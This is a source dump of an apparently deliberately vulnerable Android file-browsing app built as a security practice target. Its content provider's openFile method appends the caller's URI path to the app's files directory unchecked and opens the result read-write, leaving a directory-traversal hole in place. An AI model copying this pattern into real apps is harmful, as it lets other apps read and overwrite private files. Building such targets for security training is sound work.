| rootProject.name='ExploitDirectoryTraversal' 2 | include ':app' 3 | -------------------------------------------------------------------------------- /FileApp/.gitignore: -------------------------------------------------------------------------------- 1 | 2 | # Created by https://www.gitignore.io/api/android,androidstudio 3 | # Edit at https://www.gitignore.io/?templates=android,androidstudio 4 | 5 | ### Android ### 6 | # Built application files 7 | *.apk 8 | *.ap_ 9 | *.aab 10 | 11 | # Files for the ART/Dalvik VM 12 | *.dex 13 | 14 | # Java class files 15 | *.class 16 | 17 | # Generated files 18 | bin/ 19 | gen/ 20 | out/ 21 | release/ 22 | 23 | # Gradle files 24 | .gradle/ 25 | build/ 26 | 27 | # Local configuration file (sdk path, etc) 28 | local.properties 29 | 30 | # Proguard folder generated by Eclipse 31 | proguard/ 32 | 33 | # Log Files 34 | *.log 35 | 36 | # Android Studio Navigation editor temp files 37 | .navigation/ 38 | 39 | # Android Studio captures folder 40 | captures/ 41 | 42 | # IntelliJ 43 | *.iml 44 | .idea/workspace.xml 45 | .idea/tasks.xml 46 | .idea/gradle.xml 47 | .idea/assetWizardSettings.xml 48 | .idea/dictionaries 49 | .idea/libraries 50 | # Android Studio 3 in .gitignore file. 51 | .idea/caches 52 | .idea/modules.xml 53 | # Comment next line if keeping position of elements in Navigation Editor is relevant for you 54 | .idea/navEditor.xml 55 | 56 | # Keystore files 57 | # Uncomment the following lines if you do not want to check your keystore files in. 58 | #*.jks 59 | #*.keystore 60 | 61 | # External native build folder generated in Android Studio 2.2 and later 62 | .externalNativeBuild 63 | 64 | # Google Services (e.g. APIs or Firebase) 65 | # google-services.json 66 | 67 | # Freeline 68 | freeline.py 69 | freeline/ 70 | freeline_project_description.json 71 | 72 | # fastlane 73 | fastlane/report.xml 74 | fastlane/Preview.html 75 | fastlane/screenshots 76 | fastlane/test_output 77 | fastlane/readme.md 78 | 79 | # Version control 80 | vcs.xml 81 | 82 | # lint 83 | lint/intermediates/ 84 | lint/generated/ 85 | lint/outputs/ 86 | lint/tmp/ 87 | # lint/reports/ 88 | 89 | ### Android Patch ### 90 | gen-external-apklibs 91 | output.json 92 | 93 | # Replacement of .externalNativeBuild directories introduced 94 | # with Android Studio 3.5. 95 | .cxx/ 96 | 97 | ### AndroidStudio ### 98 | # Covers files to be ignored for android development using Android Studio. 99 | 100 | # Built application files 101 | 102 | # Files for the ART/Dalvik VM 103 | 104 | # Java class files 105 | 106 | # Generated files 107 | 108 | # Gradle files 109 | .gradle 110 | 111 | # Signing files 112 | .signing/ 113 | 114 | # Local configuration file (sdk path, etc) 115 | 116 | # Proguard folder generated by Eclipse 117 | 118 | # Log Files 119 | 120 | # Android Studio 121 | /*/build/ 122 | /*/local.properties 123 | /*/out 124 | /*/*/build 125 | /*/*/production 126 | *.ipr 127 | *~ 128 | *.swp 129 | 130 | # Android Patch 131 | 132 | # External native build folder generated in Android Studio 2.2 and later 133 | 134 | # NDK 135 | obj/ 136 | 137 | # IntelliJ IDEA 138 | *.iws 139 | /out/ 140 | 141 | # User-specific configurations 142 | .idea/caches/ 143 | .idea/libraries/ 144 | .idea/shelf/ 145 | .idea/.name 146 | .idea/compiler.xml 147 | .idea/copyright/profiles_settings.xml 148 | .idea/encodings.xml 149 | .idea/misc.xml 150 | .idea/scopes/scope_settings.xml 151 | .idea/vcs.xml 152 | .idea/jsLibraryMappings.xml 153 | .idea/datasources.xml 154 | .idea/dataSources.ids 155 | .idea/sqlDataSources.xml 156 | .idea/dynamic.xml 157 | .idea/uiDesigner.xml 158 | 159 | # OS-specific files 160 | .DS_Store 161 | .DS_Store? 162 | ._* 163 | .Spotlight-V100 164 | .Trashes 165 | ehthumbs.db 166 | Thumbs.db 167 | 168 | # Legacy Eclipse project files 169 | .classpath 170 | .project 171 | .cproject 172 | .settings/ 173 | 174 | # Mobile Tools for Java (J2ME) 175 | .mtj.tmp/ 176 | 177 | # Package Files # 178 | *.war 179 | *.ear 180 | 181 | # virtual machine crash logs (Reference: http://www.java.com/en/download/help/error_hotspot.xml) 182 | hs_err_pid* 183 | 184 | ## Plugin-specific files: 185 | 186 | # mpeltonen/sbt-idea plugin 187 | .idea_modules/ 188 | 189 | # JIRA plugin 190 | atlassian-ide-plugin.xml 191 | 192 | # Mongo Explorer plugin 193 | .idea/mongoSettings.xml 194 | 195 | # Crashlytics plugin (for Android Studio and IntelliJ) 196 | com_crashlytics_export_strings.xml 197 | crashlytics.properties 198 | crashlytics-build.properties 199 | fabric.properties 200 | 201 | ### AndroidStudio Patch ### 202 | 203 | !/gradle/wrapper/gradle-wrapper.jar 204 | 205 | # End of https://www.gitignore.io/api/android,androidstudio 206 | -------------------------------------------------------------------------------- /FileApp/.idea/codeStyles/Project.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | xmlns:android 14 | 15 | ^$ 16 | 17 | 18 | 19 |
20 |
21 | 22 | 23 | 24 | xmlns:.* 25 | 26 | ^$ 27 | 28 | 29 | BY_NAME 30 | 31 |
32 |
33 | 34 | 35 | 36 | .*:id 37 | 38 | http://schemas.android.com/apk/res/android 39 | 40 | 41 | 42 |
43 |
44 | 45 | 46 | 47 | .*:name 48 | 49 | http://schemas.android.com/apk/res/android 50 | 51 | 52 | 53 |
54 |
55 | 56 | 57 | 58 | name 59 | 60 | ^$ 61 | 62 | 63 | 64 |
65 |
66 | 67 | 68 | 69 | style 70 | 71 | ^$ 72 | 73 | 74 | 75 |
76 |
77 | 78 | 79 | 80 | .* 81 | 82 | ^$ 83 | 84 | 85 | BY_NAME 86 | 87 |
88 |
89 | 90 | 91 | 92 | .* 93 | 94 | http://schemas.android.com/apk/res/android 95 | 96 | 97 | ANDROID_ATTRIBUTE_ORDER 98 | 99 |
100 |
101 | 102 | 103 | 104 | .* 105 | 106 | .* 107 | 108 | 109 | BY_NAME 110 | 111 |
112 | 113 | 114 | 115 | 116 | -------------------------------------------------------------------------------- /FileApp/.idea/runConfigurations.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 11 | 12 | -------------------------------------------------------------------------------- /FileApp/app/.gitignore: -------------------------------------------------------------------------------- 1 | /build 2 | -------------------------------------------------------------------------------- /FileApp/app/build.gradle: -------------------------------------------------------------------------------- 1 | apply plugin: 'com.android.application' 2 | 3 | android { 4 | compileSdkVersion 29 5 | buildToolsVersion "29.0.3" 6 | 7 | defaultConfig { 8 | applicationId "dev.d0nut.vuln.fileapp" 9 | minSdkVersion 24 10 | targetSdkVersion 29 11 | versionCode 1 12 | versionName "1.0" 13 | 14 | testInstrumentationRunner "androidx.test.runner.AndroidJUnitRunner" 15 | } 16 | 17 | buildTypes { 18 | release { 19 | minifyEnabled false 20 | proguardFiles getDefaultProguardFile('proguard-android-optimize.txt'), 'proguard-rules.pro' 21 | } 22 | debug { 23 | minifyEnabled true 24 | proguardFiles getDefaultProguardFile('proguard-android-optimize.txt'), 'proguard-rules.pro' 25 | } 26 | } 27 | 28 | viewBinding { 29 | enabled = true 30 | } 31 | } 32 | 33 | dependencies { 34 | implementation fileTree(dir: 'libs', include: ['*.jar']) 35 | 36 | implementation 'androidx.appcompat:appcompat:1.1.0' 37 | testImplementation 'junit:junit:4.12' 38 | androidTestImplementation 'androidx.test.ext:junit:1.1.1' 39 | androidTestImplementation 'androidx.test.espresso:espresso-core:3.2.0' 40 | implementation 'androidx.constraintlayout:constraintlayout:1.1.3' 41 | implementation 'androidx.recyclerview:recyclerview:1.1.0' 42 | implementation 'com.android.volley:volley:1.1.1' 43 | } 44 | -------------------------------------------------------------------------------- /FileApp/app/proguard-rules.pro: -------------------------------------------------------------------------------- 1 | # Add project specific ProGuard rules here. 2 | # You can control the set of applied configuration files using the 3 | # proguardFiles setting in build.gradle. 4 | # 5 | # For more details, see 6 | # http://developer.android.com/guide/developing/tools/proguard.html 7 | 8 | # If your project uses WebView with JS, uncomment the following 9 | # and specify the fully qualified class name to the JavaScript interface 10 | # class: 11 | #-keepclassmembers class fqcn.of.javascript.interface.for.webview { 12 | # public *; 13 | #} 14 | 15 | # Uncomment this to preserve the line number information for 16 | # debugging stack traces. 17 | #-keepattributes SourceFile,LineNumberTable 18 | 19 | # If you keep the line number information, uncomment this to 20 | # hide the original source file name. 21 | #-renamesourcefileattribute SourceFile 22 | -------------------------------------------------------------------------------- /FileApp/app/src/androidTest/java/dev/d0nut/vuln/fileapp/ExampleInstrumentedTest.java: -------------------------------------------------------------------------------- 1 | package dev.d0nut.vuln.fileapp; 2 | 3 | import android.content.Context; 4 | 5 | import androidx.test.platform.app.InstrumentationRegistry; 6 | import androidx.test.ext.junit.runners.AndroidJUnit4; 7 | 8 | import org.junit.Test; 9 | import org.junit.runner.RunWith; 10 | 11 | import static org.junit.Assert.*; 12 | 13 | /** 14 | * Instrumented test, which will execute on an Android device. 15 | * 16 | * @see Testing documentation 17 | */ 18 | @RunWith(AndroidJUnit4.class) 19 | public class ExampleInstrumentedTest { 20 | @Test 21 | public void useAppContext() { 22 | // Context of the app under test. 23 | Context appContext = InstrumentationRegistry.getInstrumentation().getTargetContext(); 24 | 25 | assertEquals("dev.d0nut.vuln.fileapp", appContext.getPackageName()); 26 | } 27 | } 28 | -------------------------------------------------------------------------------- /FileApp/app/src/main/AndroidManifest.xml: -------------------------------------------------------------------------------- 1 | 3 | 4 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 27 | 28 | 29 | -------------------------------------------------------------------------------- /FileApp/app/src/main/java/dev/d0nut/vuln/fileapp/ConfigActivity.java: -------------------------------------------------------------------------------- 1 | package dev.d0nut.vuln.fileapp; 2 | 3 | import android.app.Activity; 4 | import android.content.SharedPreferences; 5 | import android.os.Bundle; 6 | import android.view.View; 7 | 8 | import androidx.annotation.Nullable; 9 | 10 | import dev.d0nut.vuln.fileapp.databinding.ActivityConfigBinding; 11 | 12 | public class ConfigActivity extends Activity { 13 | public static final String PREFERENCES = "preferences"; 14 | public static final String SERVER_ADDRESS = "server_address"; 15 | private ActivityConfigBinding binding; 16 | 17 | @Override 18 | protected void onCreate(@Nullable Bundle savedInstanceState) { 19 | super.onCreate(savedInstanceState); 20 | 21 | binding = ActivityConfigBinding.inflate(getLayoutInflater()); 22 | View view = binding.getRoot(); 23 | setContentView(view); 24 | 25 | binding.backButton.setOnClickListener(new View.OnClickListener() { 26 | @Override 27 | public void onClick(View v) { 28 | finish(); 29 | } 30 | }); 31 | } 32 | 33 | @Override 34 | protected void onResume() { 35 | super.onResume(); 36 | 37 | String serverAddress = getSharedPreferences(ConfigActivity.PREFERENCES, MODE_PRIVATE).getString(ConfigActivity.SERVER_ADDRESS, ""); 38 | binding.serverAddressField.setText(serverAddress); 39 | } 40 | 41 | @Override 42 | protected void onPause() { 43 | super.onPause(); 44 | 45 | String serverAddress = binding.serverAddressField.getText().toString(); 46 | 47 | saveServerAddress(serverAddress); 48 | } 49 | 50 | private void saveServerAddress(String serverAddress) { 51 | SharedPreferences.Editor editor = getSharedPreferences(ConfigActivity.PREFERENCES, MODE_PRIVATE).edit(); 52 | editor.putString(ConfigActivity.SERVER_ADDRESS, serverAddress); 53 | editor.apply(); 54 | } 55 | } 56 | -------------------------------------------------------------------------------- /FileApp/app/src/main/java/dev/d0nut/vuln/fileapp/CustomContentProvider.java: -------------------------------------------------------------------------------- 1 | package dev.d0nut.vuln.fileapp; 2 | 3 | import android.content.ContentProvider; 4 | import android.content.ContentValues; 5 | import android.database.Cursor; 6 | import android.net.Uri; 7 | import android.os.ParcelFileDescriptor; 8 | 9 | import androidx.annotation.NonNull; 10 | import androidx.annotation.Nullable; 11 | 12 | import java.io.File; 13 | import java.io.FileNotFoundException; 14 | 15 | public class CustomContentProvider extends ContentProvider { 16 | @Override 17 | public boolean onCreate() { 18 | return true; 19 | } 20 | 21 | @Nullable 22 | @Override 23 | public Cursor query(@NonNull Uri uri, @Nullable String[] projection, @Nullable String selection, @Nullable String[] selectionArgs, @Nullable String sortOrder) { 24 | return null; 25 | } 26 | 27 | @Nullable 28 | @Override 29 | public String getType(@NonNull Uri uri) { 30 | return null; 31 | } 32 | 33 | @Nullable 34 | @Override 35 | public Uri insert(@NonNull Uri uri, @Nullable ContentValues values) { 36 | return null; 37 | } 38 | 39 | @Override 40 | public int delete(@NonNull Uri uri, @Nullable String selection, @Nullable String[] selectionArgs) { 41 | return 0; 42 | } 43 | 44 | @Override 45 | public int update(@NonNull Uri uri, @Nullable ContentValues values, @Nullable String selection, @Nullable String[] selectionArgs) { 46 | return 0; 47 | } 48 | 49 | @Override 50 | public ParcelFileDescriptor openFile(@NonNull Uri uri, @NonNull String mode) throws FileNotFoundException { 51 | File file = new File(getContext().getFilesDir(), uri.getPath()); 52 | 53 | try { 54 | return ParcelFileDescriptor.open(file, ParcelFileDescriptor.MODE_READ_WRITE); 55 | } 56 | catch (FileNotFoundException e) { 57 | e.printStackTrace(); 58 | return null; 59 | } 60 | } 61 | } 62 | -------------------------------------------------------------------------------- /FileApp/app/src/main/java/dev/d0nut/vuln/fileapp/FileApplication.java: -------------------------------------------------------------------------------- 1 | package dev.d0nut.vuln.fileapp; 2 | 3 | import android.app.Application; 4 | 5 | import com.android.volley.RequestQueue; 6 | import com.android.volley.toolbox.Volley; 7 | 8 | public class FileApplication extends Application { 9 | public RequestQueue requestQueue; 10 | 11 | @Override 12 | public void onCreate() { 13 | super.onCreate(); 14 | requestQueue = Volley.newRequestQueue(this); 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /FileApp/app/src/main/java/dev/d0nut/vuln/fileapp/FileListActivity.java: -------------------------------------------------------------------------------- 1 | package dev.d0nut.vuln.fileapp; 2 | 3 | import android.app.Activity; 4 | import android.content.Context; 5 | import android.content.Intent; 6 | import android.os.Bundle; 7 | import android.view.LayoutInflater; 8 | import android.view.View; 9 | import android.view.ViewGroup; 10 | import android.widget.ArrayAdapter; 11 | import android.widget.ImageView; 12 | import android.widget.TextView; 13 | import android.widget.Toast; 14 | 15 | import androidx.annotation.NonNull; 16 | import androidx.annotation.Nullable; 17 | 18 | import com.android.volley.Request; 19 | import com.android.volley.Response; 20 | import com.android.volley.VolleyError; 21 | import com.android.volley.toolbox.JsonObjectRequest; 22 | 23 | import org.json.JSONArray; 24 | import org.json.JSONException; 25 | import org.json.JSONObject; 26 | 27 | import java.util.ArrayList; 28 | 29 | import dev.d0nut.vuln.fileapp.databinding.ActivityFilesBinding; 30 | 31 | public class FileListActivity extends Activity { 32 | private ActivityFilesBinding binding; 33 | private FileListAdapter adapter; 34 | 35 | @Override 36 | protected void onCreate(@Nullable Bundle savedInstanceState) { 37 | super.onCreate(savedInstanceState); 38 | // do stuff here 39 | 40 | binding = ActivityFilesBinding.inflate(getLayoutInflater()); 41 | View view = binding.getRoot(); 42 | setContentView(view); 43 | 44 | adapter = new FileListAdapter(this, R.layout.item_file); 45 | binding.fileList.setAdapter(adapter); 46 | 47 | Intent callingIntent = getIntent(); 48 | fetchFiles(callingIntent.getStringExtra("token")); 49 | } 50 | 51 | private void fetchFiles(String token) { 52 | String serverAddress = getSharedPreferences(ConfigActivity.PREFERENCES, MODE_PRIVATE).getString(ConfigActivity.SERVER_ADDRESS, null); 53 | 54 | JSONObject body = new JSONObject(); 55 | 56 | try { 57 | body.put("token", token); 58 | } catch (JSONException e) { 59 | // whoops 60 | finish(); 61 | } 62 | 63 | JsonObjectRequest request = new JsonObjectRequest(Request.Method.POST, serverAddress + "/api/files", body, new Response.Listener() { 64 | @Override 65 | public void onResponse(JSONObject response) { 66 | try { 67 | ArrayList files = new ArrayList<>(); 68 | JSONArray array = response.getJSONArray("data"); 69 | 70 | for(int i = 0; i < array.length(); i ++) { 71 | JSONObject item = array.getJSONObject(i); 72 | String name = item.getString("name"); 73 | String mime = item.getString("mime"); 74 | 75 | files.add(new AppFile(name, mime)); 76 | } 77 | 78 | adapter.addAll(files); 79 | adapter.notifyDataSetChanged(); 80 | } catch (JSONException e) { 81 | // error 82 | finish(); 83 | } 84 | } 85 | }, new Response.ErrorListener() { 86 | @Override 87 | public void onErrorResponse(VolleyError error) { 88 | finish(); 89 | } 90 | }); 91 | 92 | ((FileApplication)getApplication()).requestQueue.add(request); 93 | } 94 | 95 | 96 | class FileListAdapter extends ArrayAdapter { 97 | ArrayList files = new ArrayList(); 98 | 99 | public FileListAdapter(@NonNull Context context, int resource) { 100 | super(context, resource); 101 | } 102 | 103 | @NonNull 104 | @Override 105 | public View getView(int position, @Nullable View convertView, @NonNull ViewGroup parent) { 106 | LayoutInflater inflater = getLayoutInflater(); 107 | 108 | if(convertView == null) { 109 | convertView = inflater.inflate(R.layout.item_file, parent, false); 110 | } 111 | 112 | ImageView icon = convertView.findViewById(R.id.item_type_icon); 113 | TextView name = convertView.findViewById(R.id.file_name); 114 | 115 | AppFile appFile = getItem(position); 116 | 117 | icon.setImageDrawable(getResources().getDrawable(getResourceIdForMime(appFile.mime))); 118 | name.setText(appFile.name); 119 | 120 | return convertView; 121 | } 122 | 123 | private int getResourceIdForMime(String mime) { 124 | if(mime.contains("image/")) { 125 | // image 126 | return R.drawable.icon_image; 127 | } else if(mime.contains("excel")) { 128 | // excel 129 | return R.drawable.icon_excel; 130 | } else if(mime.contains("pdf")) { 131 | // pdf 132 | return R.drawable.icon_pdf; 133 | } else if(mime.contains("document")) { 134 | // docx 135 | return R.drawable.icon_document; 136 | } else { 137 | return R.drawable.donut; 138 | } 139 | } 140 | } 141 | 142 | class AppFile { 143 | public String name; 144 | public String mime; 145 | 146 | public AppFile(String name, String mime) { 147 | this.name = name; 148 | this.mime = mime; 149 | } 150 | } 151 | } 152 | -------------------------------------------------------------------------------- /FileApp/app/src/main/java/dev/d0nut/vuln/fileapp/LoginActivity.java: -------------------------------------------------------------------------------- 1 | package dev.d0nut.vuln.fileapp; 2 | 3 | import android.app.Activity; 4 | import android.content.Context; 5 | import android.content.Intent; 6 | import android.os.Bundle; 7 | import android.view.View; 8 | import android.view.inputmethod.InputMethodManager; 9 | import android.widget.Toast; 10 | 11 | import androidx.annotation.Nullable; 12 | 13 | import com.android.volley.Request; 14 | import com.android.volley.Response; 15 | import com.android.volley.VolleyError; 16 | import com.android.volley.toolbox.JsonObjectRequest; 17 | 18 | import org.json.JSONException; 19 | import org.json.JSONObject; 20 | 21 | import dev.d0nut.vuln.fileapp.databinding.ActivityMainBinding; 22 | 23 | public class LoginActivity extends Activity { 24 | 25 | private ActivityMainBinding binding; 26 | 27 | @Override 28 | protected void onCreate(@Nullable Bundle savedInstanceState) { 29 | super.onCreate(savedInstanceState); 30 | 31 | binding = ActivityMainBinding.inflate(getLayoutInflater()); 32 | View view = binding.getRoot(); 33 | setContentView(view); 34 | 35 | binding.loginButton.setOnClickListener(new View.OnClickListener() { 36 | @Override 37 | public void onClick(View v) { 38 | 39 | String username = binding.usernameField.getText().toString(); 40 | String password = binding.passwordField.getText().toString(); 41 | 42 | if (username.isEmpty() || password.isEmpty()) { 43 | // do nothing? 44 | return; 45 | } 46 | 47 | binding.passwordField.setText(""); 48 | 49 | binding.loginProgress.setVisibility(View.VISIBLE); 50 | dismissKeyboard(); 51 | 52 | doLogin(username, password); 53 | } 54 | }); 55 | 56 | binding.buttonConfig.setOnClickListener(new View.OnClickListener() { 57 | @Override 58 | public void onClick(View v) { 59 | startActivity(new Intent(LoginActivity.this, ConfigActivity.class)); 60 | } 61 | }); 62 | } 63 | 64 | private void doLogin(String username, String password) { 65 | // do login 66 | String serverAddress = getSharedPreferences(ConfigActivity.PREFERENCES, MODE_PRIVATE).getString(ConfigActivity.SERVER_ADDRESS, null); 67 | 68 | JSONObject body = new JSONObject(); 69 | 70 | try { 71 | body.put("username", username); 72 | body.put("password", password); 73 | } catch (JSONException e) { 74 | // whoops 75 | binding.loginProgress.setVisibility(View.INVISIBLE); 76 | return; 77 | } 78 | 79 | JsonObjectRequest request = new JsonObjectRequest(Request.Method.POST, serverAddress + "/api/auth", body, new Response.Listener() { 80 | @Override 81 | public void onResponse(JSONObject response) { 82 | binding.loginProgress.setVisibility(View.INVISIBLE); 83 | 84 | try { 85 | if(response.getBoolean("success")) { 86 | // successful login 87 | String token = response.getJSONObject("data").getString("token"); 88 | 89 | Intent intent = new Intent(LoginActivity.this, FileListActivity.class); 90 | intent.putExtra("token", token); 91 | startActivity(intent); 92 | } else { 93 | // error? 94 | Toast.makeText(getApplicationContext(), getResources().getString(R.string.error_unknown_error), Toast.LENGTH_SHORT).show(); 95 | } 96 | } catch (JSONException e) { 97 | // error 98 | Toast.makeText(getApplicationContext(), getResources().getString(R.string.error_unknown_error), Toast.LENGTH_SHORT).show(); 99 | } 100 | } 101 | }, new Response.ErrorListener() { 102 | @Override 103 | public void onErrorResponse(VolleyError error) { 104 | binding.loginProgress.setVisibility(View.INVISIBLE); 105 | 106 | if(error.networkResponse.statusCode == 401) { 107 | Toast.makeText(getApplicationContext(), getResources().getString(R.string.error_invalid_auth), Toast.LENGTH_SHORT).show(); 108 | } else { 109 | Toast.makeText(getApplicationContext(), getResources().getString(R.string.error_unknown_error), Toast.LENGTH_SHORT).show(); 110 | } 111 | } 112 | }); 113 | 114 | ((FileApplication)getApplication()).requestQueue.add(request); 115 | } 116 | 117 | private void dismissKeyboard() { 118 | InputMethodManager imm = (InputMethodManager)getSystemService(Context.INPUT_METHOD_SERVICE); 119 | imm.hideSoftInputFromWindow(binding.passwordField.getWindowToken(), 0); 120 | imm.hideSoftInputFromWindow(binding.usernameField.getWindowToken(), 0); 121 | } 122 | } 123 | -------------------------------------------------------------------------------- /FileApp/app/src/main/res/drawable-v24/ic_launcher_foreground.xml: -------------------------------------------------------------------------------- 1 | 7 | 8 | 9 | 15 | 18 | 21 | 22 | 23 | 24 | 30 | -------------------------------------------------------------------------------- /FileApp/app/src/main/res/drawable/back.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/drawable/back.png -------------------------------------------------------------------------------- /FileApp/app/src/main/res/drawable/donut.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/drawable/donut.png -------------------------------------------------------------------------------- /FileApp/app/src/main/res/drawable/folder.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/drawable/folder.png -------------------------------------------------------------------------------- /FileApp/app/src/main/res/drawable/gear.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/drawable/gear.png -------------------------------------------------------------------------------- /FileApp/app/src/main/res/drawable/ic_launcher_background.xml: -------------------------------------------------------------------------------- 1 | 2 | 7 | 10 | 15 | 20 | 25 | 30 | 35 | 40 | 45 | 50 | 55 | 60 | 65 | 70 | 75 | 80 | 85 | 90 | 95 | 100 | 105 | 110 | 115 | 120 | 125 | 130 | 135 | 140 | 145 | 150 | 155 | 160 | 165 | 170 | 171 | -------------------------------------------------------------------------------- /FileApp/app/src/main/res/drawable/icon_document.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/drawable/icon_document.png -------------------------------------------------------------------------------- /FileApp/app/src/main/res/drawable/icon_excel.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/drawable/icon_excel.png -------------------------------------------------------------------------------- /FileApp/app/src/main/res/drawable/icon_image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/drawable/icon_image.png -------------------------------------------------------------------------------- /FileApp/app/src/main/res/drawable/icon_pdf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/d0nutptr/Vulnerable-File-App/5aa2073b4421e95546f438096dcaf779404251eb/FileApp/app/src/main/res/drawable/icon_pdf.png -------------------------------------------------------------------------------- /FileApp/app/src/main/res/layout/activity_config.xml: -------------------------------------------------------------------------------- 1 | 2 | 8 | 9 | 16 | 17 | 24 | 25 | 34 | 35 | 36 | 42 | 43 | 53 | 54 | 55 | -------------------------------------------------------------------------------- /FileApp/app/src/main/res/layout/activity_files.xml: -------------------------------------------------------------------------------- 1 | 2 | 8 | 9 | 16 | 17 | 23 | 24 | 33 | 34 | 35 | 39 | -------------------------------------------------------------------------------- /FileApp/app/src/main/res/layout/activity_main.xml: -------------------------------------------------------------------------------- 1 | 2 | 9 | 10 | 15 | 16 | 21 | 22 | 28 | 29 | 37 | 38 | 39 | 40 | 48 | 49 | 58 | 59 | 68 | 69 | 73 | 74 | 84 | 85 |